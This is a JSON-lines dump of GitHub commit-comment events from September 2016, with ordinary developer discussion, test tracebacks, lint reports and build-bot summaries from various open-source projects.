{"id":"4541220556","type":"CommitCommentEvent","actor":{"login":"k-okada"},"repo":{"name":"jsk-ros-pkg/jsk_recognition"},"payload":{"comment":{"id":18966112,"position":8,"line":8,"path":"jsk_pcl_ros/test/test_euclidean_segmentation.test","commit_id":"fc5fa1677ea09a6b84b995346f0ef2b938e1dc57","created_at":"2016-09-09T17:04:08Z","updated_at":"2016-09-09T17:04:08Z","body":"If you set `--clock` here, you need to set `use_sim_time`\r\n http://answers.ros.org/question/12577/when-should-i-need-clock-parameter-on-rosbag-play/"}},"created_at":"2016-09-09T17:04:08Z"}
{"id":"4541220630","type":"CommitCommentEvent","actor":{"login":"cstrahan"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18966113,"position":28,"line":184,"path":"nixos/lib/testing.nix","commit_id":"75baee8523f62b75a0cf350a8360ce8f3e3c3695","created_at":"2016-09-09T17:04:09Z","updated_at":"2016-09-09T17:04:09Z","body":"@edolstra Did you intend to leave `xchg` defined/set?"}},"created_at":"2016-09-09T17:04:09Z"}
{"id":"4541224301","type":"CommitCommentEvent","actor":{"login":"thomasdenney"},"repo":{"name":"Microsoft/pxt-microbit"},"payload":{"comment":{"id":18966133,"position":null,"line":null,"path":null,"commit_id":"ef4b06a0874c32bca230d57ee0fddfdac6a9369c","created_at":"2016-09-09T17:04:55Z","updated_at":"2016-09-09T17:04:55Z","body":"@pelikhan I was merging the remote into one of my local branches and then merged that into my local master before pushing (I think). GitHub shows the two parents for this commit as the previous commit in master and the previous commit in my older copy of master. I think GitHub is just showing the diff between the most recent change (renaming data.xls to data.csv) and the older parent."}},"created_at":"2016-09-09T17:04:55Z"}
{"id":"4541227404","type":"CommitCommentEvent","actor":{"login":"dloss"},"repo":{"name":"bluhm/regress-all"},"payload":{"comment":{"id":18966143,"position":null,"line":null,"path":null,"commit_id":"980c02a58e90926f011d0e56acf082326d5cad0e","created_at":"2016-09-09T17:05:33Z","updated_at":"2016-09-09T17:05:33Z","body":"Nice! "}},"created_at":"2016-09-09T17:05:33Z"}
{"id":"4541227820","type":"CommitCommentEvent","actor":{"login":"seonghobae"},"repo":{"name":"seonghobae/k.aefa"},"payload":{"comment":{"id":18966144,"position":null,"line":null,"path":null,"commit_id":"47374e997acfbb364eb4d3c1ef308b20517de6bc","created_at":"2016-09-09T17:05:38Z","updated_at":"2016-09-09T17:05:38Z","body":"and see also this: Falk, C. F., & Cai, L. (2015). A Flexible Full-Information Approach to the Modeling of Response Styles. Psychological Methods, 21(3), 328–347. http://doi.org/10.1037/met0000059"}},"created_at":"2016-09-09T17:05:38Z"}
{"id":"4541229058","type":"CommitCommentEvent","actor":{"login":"k-okada"},"repo":{"name":"jsk-ros-pkg/jsk_recognition"},"payload":{"comment":{"id":18966150,"position":8,"line":8,"path":"jsk_pcl_ros/test/test_euclidean_segmentation.test","commit_id":"fc5fa1677ea09a6b84b995346f0ef2b938e1dc57","created_at":"2016-09-09T17:05:52Z","updated_at":"2016-09-09T17:05:52Z","body":"And if you set 'use_sim_time`, then you'll get\r\n```\r\n$ rostest test/test_color_based_region_growing_segmentation.test \r\n... logging to /home/k-okada/.ros/log/rostest-kokada-t440s-9334.log\r\n[ROSUNIT] Outputting test results to /home/k-okada/.ros/test_results/jsk_pcl_ros/rostest-test_test_color_based_region_growing_segmentation.xml\r\n[ERROR] [1473440681.185458352, 1467775004.412219891]: subscribe->\r\n[ERROR] [1473440681.464760151, 1467775004.695655302]: subscribe <\r\n[ERROR] [1473440688.689255479, 1467775011.922881369]: subscribe <\r\nTraceback (most recent call last):\r\n  File \"/opt/ros/indigo/share/jsk_tools/src/test_topic_published.py\", line 61, in <module>\r\n    rostest.run(PKG, NAME, TestTopicPublished, sys.argv)\r\n  File \"/opt/ros/indigo/lib/python2.7/dist-packages/rostest/__init__.py\", line 145, in rosrun\r\n    result = rosunit.create_xml_runner(package, test_name, result_file).run(suite)\r\n  File \"/opt/ros/indigo/lib/python2.7/dist-packages/rosunit/xmlrunner.py\", line 233, in run\r\n    test(result)\r\n  File \"/usr/lib/python2.7/unittest/suite.py\", line 70, in __call__\r\n    return self.run(*args, **kwds)\r\n  File \"/usr/lib/python2.7/unittest/suite.py\", line 108, in run\r\n    test(result)\r\n  File \"/usr/lib/python2.7/unittest/case.py\", line 395, in __call__\r\n    return self.run(*args, **kwds)\r\n  File \"/usr/lib/python2.7/unittest/case.py\", line 331, in run\r\n    testMethod()\r\n  File \"/opt/ros/indigo/share/jsk_tools/src/test_topic_published.py\", line 56, in test_published\r\n    assert_true(checker.check(), msg)\r\n  File \"/opt/ros/indigo/share/jsk_tools/src/jsk_tools/sanity_lib.py\", line 81, in check\r\n    rospy.sleep(0.1)\r\n  File \"/opt/ros/indigo/lib/python2.7/dist-packages/rospy/timer.py\", line 155, in sleep\r\n    raise rospy.exceptions.ROSTimeMovedBackwardsException(time_jump)\r\nrospy.exceptions.ROSTimeMovedBackwardsException: ROS time moved backwards\r\ntesttest_color_based_region_growing_segmentation ... ok\r\n```"}},"created_at":"2016-09-09T17:05:52Z"}
{"id":"4541231283","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"Shnoulle/LimeSurvey-Shnoulle"},"payload":{"comment":{"id":18966163,"position":null,"line":null,"path":null,"commit_id":"0cc1b232005d5c85f2150453657af14dc2c10cf7","created_at":"2016-09-09T17:06:20Z","updated_at":"2016-09-09T17:06:20Z","body":"? no ... \r\n\r\nWe fix h3 when we have a cleaner system. BUT here : there are a div open and not closed : https://github.com/Shnoulle/LimeSurvey-Shnoulle/commit/0cc1b232005d5c85f2150453657af14dc2c10cf7#diff-c20ef43e3a96eeb453bf49ca0ca4c030L74\r\n\r\nThis broke html really."}},"created_at":"2016-09-09T17:06:20Z"}
{"id":"4541234022","type":"CommitCommentEvent","actor":{"login":"tamarazuk"},"repo":{"name":"woothemes/woocommerce"},"payload":{"comment":{"id":18966173,"position":null,"line":null,"path":null,"commit_id":"e2d206421d8b47adc622e4e56d72e939da48ca71","created_at":"2016-09-09T17:06:53Z","updated_at":"2016-09-09T17:06:53Z","body":"@claudiosmweb just tested with Brazil postcode and it gets saved as `99999-999` in the database.\r\n\r\nIt would be nice if WC supported both `99999` and `99999-9999` formats for US and saved them as such so they can be used by gateways etc (or at least provided functions that return the postcode in the requested format). \r\n\r\nHowever, I have already scheduled a fix release for Chase Paymentech for next week so we can make sure merchants trying to perform the certification can complete the steps involving ZIP+4 postcodes.\r\n\r\nIf you guys don't think WooCommerce should handle the formatting, that's fine too, we'll add it to our framework to be used by our other gateways. \r\n\r\nThanks for your help. "}},"created_at":"2016-09-09T17:06:53Z"}
{"id":"4541236080","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"Shnoulle/LimeSurvey-Shnoulle"},"payload":{"comment":{"id":18966184,"position":null,"line":null,"path":null,"commit_id":"0cc1b232005d5c85f2150453657af14dc2c10cf7","created_at":"2016-09-09T17:07:20Z","updated_at":"2016-09-09T17:07:20Z","body":"Remind : h3 need an h2 need an h1.\r\n\r\nAnd hx system must be in template not in core"}},"created_at":"2016-09-09T17:07:20Z"}
{"id":"4541238937","type":"CommitCommentEvent","actor":{"login":"chelseakomlo"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":18966193,"position":4,"line":3,"path":"otrv4.md","commit_id":"2762fe8069bf5bd422061add8780731c137c8df4","created_at":"2016-09-09T17:07:55Z","updated_at":"2016-09-09T17:07:55Z","body":"Fair point. But we also say \"in a way that comes as close as possible.\" Can think about simpler wording."}},"created_at":"2016-09-09T17:07:55Z"}
{"id":"4541239535","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.tiles"},"payload":{"comment":{"id":18966194,"position":null,"line":null,"path":null,"commit_id":"06ed3c6f2cd522fd0c4221cc62ec27b0be998c04","created_at":"2016-09-09T17:08:03Z","updated_at":"2016-09-09T17:08:03Z","body":"@vangheem Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.tiles/41/violations\n```\nplone/tiles/__init__.py:0:1: I001 isort found changes, run it on the file\nplone/tiles/data.py:182:1: C901 'map_to_pairs' is too complex (12)\nplone/tiles/data.py:230:1: C901 'encode' is too complex (15)\nplone/tiles/data.py:311:1: C901 'decode' is too complex (13)\nplone/tiles/directives.py:0:1: I001 isort found changes, run it on the file\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-09T17:08:03Z"}
{"id":"4541240002","type":"CommitCommentEvent","actor":{"login":"zhongwencool"},"repo":{"name":"zhongwencool/erlang-rock"},"payload":{"comment":{"id":18966195,"position":null,"line":null,"path":null,"commit_id":"184f6e14efaaaa845ed25b10bd1f10214e902055","created_at":"2016-09-09T17:08:10Z","updated_at":"2016-09-09T17:08:10Z","body":"- rebar3 shell\r\n```erlang\r\n===> Booted zoo\r\n{1,2,30} [fish_keeper   ] is working\r\n1> {1,2,33} [fish_keeper   ] is working\r\n{1,2,36} [fish_keeper   ] is working\r\n{1,2,39} [fish_keeper   ] is working\r\n{1,2,42} [fish_keeper   ] is working\r\nerlang:send(fish_keeper, off_duty).\r\n{1,2,43} [   fish_keeper] terminate by off_duty\r\noff_duty\r\n\r\n=ERROR REPORT==== 10-Sep-2016::01:02:43 ===\r\n** Generic server fish_keeper terminating\r\n** Last message in was off_duty\r\n** When Server state == fish_keeper\r\n** Reason for termination ==\r\n** {off_duty,[{zoo_keeper,handle_info,2,\r\n                          [{file,\"/Users/zhongwen/github/erlang-rock/restart-strategy/zoo/_build/default/lib/zoo/src/zoo_keeper.erl\"},\r\n                           {line,33}]},\r\n              {gen_server,try_dispatch,4,[{file,\"gen_server.erl\"},{line,615}]},\r\n              {gen_server,handle_msg,5,[{file,\"gen_server.erl\"},{line,681}]},\r\n              {proc_lib,init_p_do_apply,3,\r\n                        [{file,\"proc_lib.erl\"},{line,240}]}]}\r\n2> {1,2,43} [fish_keeper   ] is starting\r\n\r\n=CRASH REPORT==== 10-Sep-2016::01:02:43 ===\r\n  crasher:\r\n    initial call: zoo_keeper:init/1\r\n    pid: <0.82.0>\r\n    registered_name: fish_keeper\r\n    exception exit: off_duty\r\n      in function  gen_server:terminate/7 (gen_server.erl, line 826)\r\n    ancestors: [zoo_sup,<0.80.0>]\r\n    messages: []\r\n    links: [<0.81.0>]\r\n    dictionary: []\r\n    trap_exit: true\r\n    status: running\r\n    heap_size: 987\r\n    stack_size: 27\r\n    reductions: 303\r\n  neighbours:\r\n\r\n=SUPERVISOR REPORT==== 10-Sep-2016::01:02:43 ===\r\n     Supervisor: {local,zoo_sup}\r\n     Context:    child_terminated\r\n     Reason:     off_duty\r\n     Offender:   [{pid,<0.82.0>},\r\n                  {id,fish_keeper},\r\n                  {mfargs,{zoo_keeper,start_link,[fish_keeper]}},\r\n                  {restart_type,transient},\r\n                  {shutdown,1000},\r\n                  {child_type,worker}]\r\n\r\n\r\n=PROGRESS REPORT==== 10-Sep-2016::01:02:43 ===\r\n          supervisor: {local,zoo_sup}\r\n             started: [{pid,<0.94.0>},\r\n                       {id,fish_keeper},\r\n                       {mfargs,{zoo_keeper,start_link,[fish_keeper]}},\r\n                       {restart_type,transient},\r\n                       {shutdown,1000},\r\n                       {child_type,worker}]\r\n{1,2,44} [fish_keeper   ] is working\r\n{1,2,47} [fish_keeper   ] is working\r\n{1,2,50} [fish_keeper   ] is working\r\n{1,2,53} [fish_keeper   ] is working\r\n{1,2,56} [fish_keeper   ] is working\r\n{1,2,59} [fish_keeper   ] is working\r\nerlang:send(fish_keeper, stop_normal).\r\n{1,3,1} [   fish_keeper] terminate by normal\r\nstop_normal\r\n3> erlang:whereis(fish_keeper).\r\nundefined\r\n```"}},"created_at":"2016-09-09T17:08:10Z"}
{"id":"4541241844","type":"CommitCommentEvent","actor":{"login":"chelseakomlo"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":18966199,"position":11,"line":5,"path":"otrv4.md","commit_id":"2762fe8069bf5bd422061add8780731c137c8df4","created_at":"2016-09-09T17:08:32Z","updated_at":"2016-09-09T17:08:32Z","body":"Ok, we'll make it more clear."}},"created_at":"2016-09-09T17:08:32Z"}
{"id":"4541243683","type":"CommitCommentEvent","actor":{"login":"btkostner"},"repo":{"name":"elementary/website"},"payload":{"comment":{"id":18966204,"position":null,"line":null,"path":null,"commit_id":"2e68b8f7309cdfa81c491964126d6f6e94fbd9d3","created_at":"2016-09-09T17:08:54Z","updated_at":"2016-09-09T17:08:54Z","body":"I blame Dan for making me add all of the countdown things again "}},"created_at":"2016-09-09T17:08:54Z"}
{"id":"4541244535","type":"CommitCommentEvent","actor":{"login":"hlian"},"repo":{"name":"sleexyz/haskell-fun"},"payload":{"comment":{"id":18966211,"position":145,"line":118,"path":"TypeSafePrintF.hs","commit_id":"4bb9736de002515f510769b8c00a3830b0d3dd24","created_at":"2016-09-09T17:09:03Z","updated_at":"2016-09-09T17:09:03Z","body":"hi! hao here. might be able to use TypeApplication?"}},"created_at":"2016-09-09T17:09:03Z"}
{"id":"4541257734","type":"CommitCommentEvent","actor":{"login":"cstrahan"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18966240,"position":null,"line":null,"path":null,"commit_id":"dd98b6fb9f35544201ed66733af40ff822ba8c36","created_at":"2016-09-09T17:11:50Z","updated_at":"2016-09-09T17:11:50Z","body":"@rickynils is the solution you speak of included as a commit in nixpkgs now? Just curious what that looks like."}},"created_at":"2016-09-09T17:11:50Z"}
{"id":"4541259654","type":"CommitCommentEvent","actor":{"login":"Samistine"},"repo":{"name":"Samistine/Inquisitor"},"payload":{"comment":{"id":18966245,"position":null,"line":null,"path":null,"commit_id":"d3a63053a6c5afdcdd81f6ca263d8bbd61b08fd2","created_at":"2016-09-09T17:12:15Z","updated_at":"2016-09-09T17:12:15Z","body":"Also note that I removed an unnecessary call to clear the map in the constructor."}},"created_at":"2016-09-09T17:12:15Z"}
{"id":"4541267963","type":"CommitCommentEvent","actor":{"login":"domenic"},"repo":{"name":"marti1125/html"},"payload":{"comment":{"id":18966265,"position":null,"line":null,"path":null,"commit_id":"bd14173f3751f4a7344c5cc6bbef63bdceefb805","created_at":"2016-09-09T17:13:55Z","updated_at":"2016-09-09T17:13:55Z","body":"This looks good for step 2!"}},"created_at":"2016-09-09T17:13:55Z"}
{"id":"4541269231","type":"CommitCommentEvent","actor":{"login":"belochub"},"repo":{"name":"NechaiDO/JSTP-cpp"},"payload":{"comment":{"id":18966269,"position":null,"line":null,"path":null,"commit_id":"228d88f81eeb4afef9f4774339f6ac4f05b8b679","created_at":"2016-09-09T17:14:12Z","updated_at":"2016-09-09T17:14:12Z","body":"This small fix resulted in 2x performance improvement in serialization!\r\n:anguished:"}},"created_at":"2016-09-09T17:14:12Z"}
{"id":"4541273600","type":"CommitCommentEvent","actor":{"login":"tomalec"},"repo":{"name":"Starcounter-Jack/JSON-Patch"},"payload":{"comment":{"id":18966280,"position":null,"line":null,"path":null,"commit_id":"924069918a7033849c1e61e793488b506f1849c1","created_at":"2016-09-09T17:15:11Z","updated_at":"2016-09-09T17:15:11Z","body":"We discussed it under PuppetJs organization https://github.com/PuppetJs/PuppetJs/issues/98 (we suffer for little bit of repolepsy).\r\n\r\nDo you have any problems or comments related to this?\r\n\r\n(I didn't bring back intervals, so that are just few listeners more) In long term we plan to replace it with proxies."}},"created_at":"2016-09-09T17:15:11Z"}
{"id":"4541274606","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18966282,"position":null,"line":null,"path":null,"commit_id":"d7a3aa59f4bfebfd145539efc5b65f3954faef1d","created_at":"2016-09-09T17:15:21Z","updated_at":"2016-09-09T17:15:21Z","body":"EMS (brianlball) - x86_64-MacOS-10.10-clang: OK (2292 of 2466 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-d7a3aa59f4bfebfd145539efc5b65f3954faef1d-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-d7a3aa59f4bfebfd145539efc5b65f3954faef1d-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-92.94%25-yellow.svg)</a> \n"}},"created_at":"2016-09-09T17:15:21Z"}
{"id":"4541275472","type":"CommitCommentEvent","actor":{"login":"keks93"},"repo":{"name":"Bauuuuu/android_device_zte_nx512j"},"payload":{"comment":{"id":18966284,"position":null,"line":null,"path":null,"commit_id":"52781903141b28124ceba84a1f5b4ddbbfea9be7","created_at":"2016-09-09T17:15:32Z","updated_at":"2016-09-09T17:15:32Z","body":"в wpa_supplicant_overlay тоже надо"}},"created_at":"2016-09-09T17:15:32Z"}
{"id":"4541278620","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18966291,"position":null,"line":null,"path":null,"commit_id":"0871a0be7272f8bf05bc25068aacbec9572f52d4","created_at":"2016-09-09T17:16:15Z","updated_at":"2016-09-09T17:16:15Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#A_cNAQqhSjG-YeO2jvCHaQ"}},"created_at":"2016-09-09T17:16:15Z"}
{"id":"4541288071","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18966319,"position":null,"line":null,"path":null,"commit_id":"a4ee26c12b13217ebd7fd6ee1bfa66b66e7b29b0","created_at":"2016-09-09T17:18:14Z","updated_at":"2016-09-09T17:18:14Z","body":"test_build_branch (lefticus) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: Tests Failed (1568 of 2080 tests passed, 37 test warnings)\n\n * 539 tests had: AUD diffs.\n * 530 tests had: EIO diffs.\n * 422 tests had: ESO small diffs.\n * 512 tests had: RDD diffs.\n * 497 tests had: Table big diffs.\n * 360 tests had: MTR small diffs.\n * 420 tests had: BND diffs.\n * 90 tests had: ERR diffs.\n * 116 tests had: ESO big diffs.\n * 76 tests had: MTR big diffs.\n * 4 tests had: SSZ big diffs.\n * 15 tests had: MDD diffs.\n * 35 tests had: MTD diffs.\n * 5 tests had: ZSZ big diffs.\n * 29 tests had: DXF diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ small diffs.\n * 3 tests had: delightin diffs.\n * 3 tests had: delightout diffs.\n * 1 test had: SHD diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a4ee26c12b13217ebd7fd6ee1bfa66b66e7b29b0-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a4ee26c12b13217ebd7fd6ee1bfa66b66e7b29b0-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-75.38%25-red.svg)</a> \n"}},"created_at":"2016-09-09T17:18:14Z"}
{"id":"4541289080","type":"CommitCommentEvent","actor":{"login":"ramalva92"},"repo":{"name":"ramalva92/inClassDemo2"},"payload":{"comment":{"id":18966322,"position":null,"line":null,"path":null,"commit_id":"f210fa5407efe6fae98f889a0176966cd475d089","created_at":"2016-09-09T17:18:26Z","updated_at":"2016-09-09T17:18:26Z","body":"<code>"}},"created_at":"2016-09-09T17:18:26Z"}
{"id":"4541289174","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.tiles"},"payload":{"comment":{"id":18966323,"position":null,"line":null,"path":null,"commit_id":"9119704486c21b35e61f358e50b927f71d9198b1","created_at":"2016-09-09T17:18:28Z","updated_at":"2016-09-09T17:18:28Z","body":"@vangheem Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.tiles/42/violations\n```\nplone/tiles/__init__.py:0:1: I001 isort found changes, run it on the file\nplone/tiles/data.py:188:1: C901 'map_to_pairs' is too complex (12)\nplone/tiles/data.py:236:1: C901 'encode' is too complex (15)\nplone/tiles/data.py:317:1: C901 'decode' is too complex (13)\nplone/tiles/directives.py:0:1: I001 isort found changes, run it on the file\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-09T17:18:28Z"}
{"id":"4541298253","type":"CommitCommentEvent","actor":{"login":"ApacheThunder"},"repo":{"name":"DanTheMan827/NTR_Forwarder"},"payload":{"comment":{"id":18966341,"position":null,"line":null,"path":null,"commit_id":"650801c86d7e24b406ad26161bb965d1e190e7ed","created_at":"2016-09-09T17:20:19Z","updated_at":"2016-09-09T17:20:19Z","body":"I'll download this fork and do some tests. I'll try and hunt down the gremlin that's haunting your code it seems. :P"}},"created_at":"2016-09-09T17:20:19Z"}
{"id":"4541309904","type":"CommitCommentEvent","actor":{"login":"DanTheMan827"},"repo":{"name":"DanTheMan827/NTR_Forwarder"},"payload":{"comment":{"id":18966381,"position":null,"line":null,"path":null,"commit_id":"650801c86d7e24b406ad26161bb965d1e190e7ed","created_at":"2016-09-09T17:22:44Z","updated_at":"2016-09-09T17:22:44Z","body":"I can't see why the audio would stop working though... I can put my code AFTER the splash screen but it still won't play the jingle...\r\n\r\n"}},"created_at":"2016-09-09T17:22:44Z"}
{"id":"4541315866","type":"CommitCommentEvent","actor":{"login":"scutmason"},"repo":{"name":"nekocode/nekoblog"},"payload":{"comment":{"id":18966398,"position":null,"line":null,"path":null,"commit_id":"4da9dc49be2331510dfb8fdf74bee2cc66bf4fdb","created_at":"2016-09-09T17:23:59Z","updated_at":"2016-09-09T17:23:59Z","body":"去做游戏了吗"}},"created_at":"2016-09-09T17:23:59Z"}
{"id":"4541319186","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18966411,"position":null,"line":null,"path":null,"commit_id":"a4ee26c12b13217ebd7fd6ee1bfa66b66e7b29b0","created_at":"2016-09-09T17:24:40Z","updated_at":"2016-09-09T17:24:40Z","body":"test_build_branch (lefticus) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a4ee26c12b13217ebd7fd6ee1bfa66b66e7b29b0-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-09T17:24:40Z"}
{"id":"4541320984","type":"CommitCommentEvent","actor":{"login":"aserratorta"},"repo":{"name":"Flexible-User-Experience/fibervent"},"payload":{"comment":{"id":18966420,"position":null,"line":null,"path":null,"commit_id":"95758f0019f64f90e4235280ab05766b33c2a4fb","created_at":"2016-09-09T17:25:04Z","updated_at":"2016-09-09T17:25:04Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;hap9MHa9&#x2F;130-keep-composer-requirements-sorted-by-name\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Keep composer requirements sorted by name</a>"}},"created_at":"2016-09-09T17:25:04Z"}
{"id":"4541325362","type":"CommitCommentEvent","actor":{"login":"jwittner"},"repo":{"name":"Microsoft/HoloToolkit-Unity"},"payload":{"comment":{"id":18966431,"position":null,"line":null,"path":null,"commit_id":"4d8fd9213fee9934e5b439f81c340b418ff0da72","created_at":"2016-09-09T17:25:59Z","updated_at":"2016-09-09T17:25:59Z","body":"Ok, I think that makes sense. I'll make an issue!"}},"created_at":"2016-09-09T17:25:59Z"}
{"id":"4541332807","type":"CommitCommentEvent","actor":{"login":"davidwhitman"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":18966452,"position":null,"line":null,"path":null,"commit_id":"3a2b1c9824ef617e3e8ca7ce9b00ec49125beba1","created_at":"2016-09-09T17:27:33Z","updated_at":"2016-09-09T17:27:33Z","body":"Nice additions!"}},"created_at":"2016-09-09T17:27:33Z"}
{"id":"4541334183","type":"CommitCommentEvent","actor":{"login":"rfinz"},"repo":{"name":"systemed/forest_roads"},"payload":{"comment":{"id":18966457,"position":82,"line":82,"path":"forest_roads.mss","commit_id":"44591bcca3e1bf98b2b49c9ac29eb7bea6ff6b6b","created_at":"2016-09-09T17:27:50Z","updated_at":"2016-09-09T17:27:50Z","body":"that's incredible. thanks!"}},"created_at":"2016-09-09T17:27:50Z"}
{"id":"4541338123","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18966471,"position":null,"line":null,"path":null,"commit_id":"e27c97cdcbfc71b3269bbcc7b2a7954dd0bec966","created_at":"2016-09-09T17:28:40Z","updated_at":"2016-09-09T17:28:40Z","body":"test_build_branch (lefticus) - x86_64-MacOS-10.9-clang: Tests Failed (1532 of 2042 tests passed, 36 test warnings)\n\n * 536 tests had: AUD diffs.\n * 527 tests had: EIO diffs.\n * 420 tests had: ESO small diffs.\n * 509 tests had: RDD diffs.\n * 495 tests had: Table big diffs.\n * 115 tests had: ESO big diffs.\n * 358 tests had: MTR small diffs.\n * 86 tests had: ERR diffs.\n * 420 tests had: BND diffs.\n * 76 tests had: MTR big diffs.\n * 4 tests had: SSZ big diffs.\n * 15 tests had: MDD diffs.\n * 35 tests had: MTD diffs.\n * 5 tests had: ZSZ big diffs.\n * 28 tests had: DXF diffs.\n * 3 tests had: delightin diffs.\n * 3 tests had: delightout diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ small diffs.\n * 1 test had: SHD diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e27c97cdcbfc71b3269bbcc7b2a7954dd0bec966-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e27c97cdcbfc71b3269bbcc7b2a7954dd0bec966-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-75.02%25-red.svg)</a> \n"}},"created_at":"2016-09-09T17:28:40Z"}
{"id":"4541338318","type":"CommitCommentEvent","actor":{"login":"jckarter"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":18966473,"position":37,"line":68,"path":"stdlib/public/stubs/GlobalObjects.cpp","commit_id":"daa7bfc281fcb35ae990eabb98548f545f1240d2","created_at":"2016-09-09T17:28:41Z","updated_at":"2016-09-09T17:28:41Z","body":"Is there a reason this has to be statically constructed? Does computing it lazily have noticeable overhead, or security concerns?"}},"created_at":"2016-09-09T17:28:41Z"}
{"id":"4541338423","type":"CommitCommentEvent","actor":{"login":"disastermanager"},"repo":{"name":"disastermanager/untitled3"},"payload":{"comment":{"id":18966474,"position":null,"line":null,"path":null,"commit_id":"584ba9cca59484affb8a79cbb87c55baf158cee1","created_at":"2016-09-09T17:28:44Z","updated_at":"2016-09-09T17:28:44Z","body":"crawl script to download movie titles (loop to be entered)"}},"created_at":"2016-09-09T17:28:44Z"}
{"id":"4541338688","type":"CommitCommentEvent","actor":{"login":"claudiosmweb"},"repo":{"name":"woothemes/woocommerce"},"payload":{"comment":{"id":18966478,"position":null,"line":null,"path":null,"commit_id":"e2d206421d8b47adc622e4e56d72e939da48ca71","created_at":"2016-09-09T17:28:47Z","updated_at":"2016-09-09T17:28:47Z","body":"@tamarazuk but if for Brazil postcode saves correct, it's not hard to \"fix\" it for US ones too.\r\nI don't think the problem is this code here. but I can check."}},"created_at":"2016-09-09T17:28:47Z"}
{"id":"4541340987","type":"CommitCommentEvent","actor":{"login":"MetinAgaoglu"},"repo":{"name":"MetinAgaoglu/Yandex-Maps-Uygulamasi"},"payload":{"comment":{"id":18966483,"position":null,"line":null,"path":null,"commit_id":"c6d9bac9194210a039fd105d21613678ca3be802","created_at":"2016-09-09T17:29:17Z","updated_at":"2016-09-09T17:29:17Z","body":"İp Adresine Göre tahmini konum alıp listelemekte"}},"created_at":"2016-09-09T17:29:17Z"}
{"id":"4541344807","type":"CommitCommentEvent","actor":{"login":"nekocode"},"repo":{"name":"nekocode/nekoblog"},"payload":{"comment":{"id":18966493,"position":null,"line":null,"path":null,"commit_id":"4da9dc49be2331510dfb8fdf74bee2cc66bf4fdb","created_at":"2016-09-09T17:30:02Z","updated_at":"2016-09-09T17:30:02Z","body":"@scutmason 这个说来话长了，目前创业失败刚踏进失业状态中。因为报酬蛮令人感动所以接了一个游戏外包。\r\n好吧不管怎样，做完这外包还是得找回 Android 的工作。"}},"created_at":"2016-09-09T17:30:02Z"}
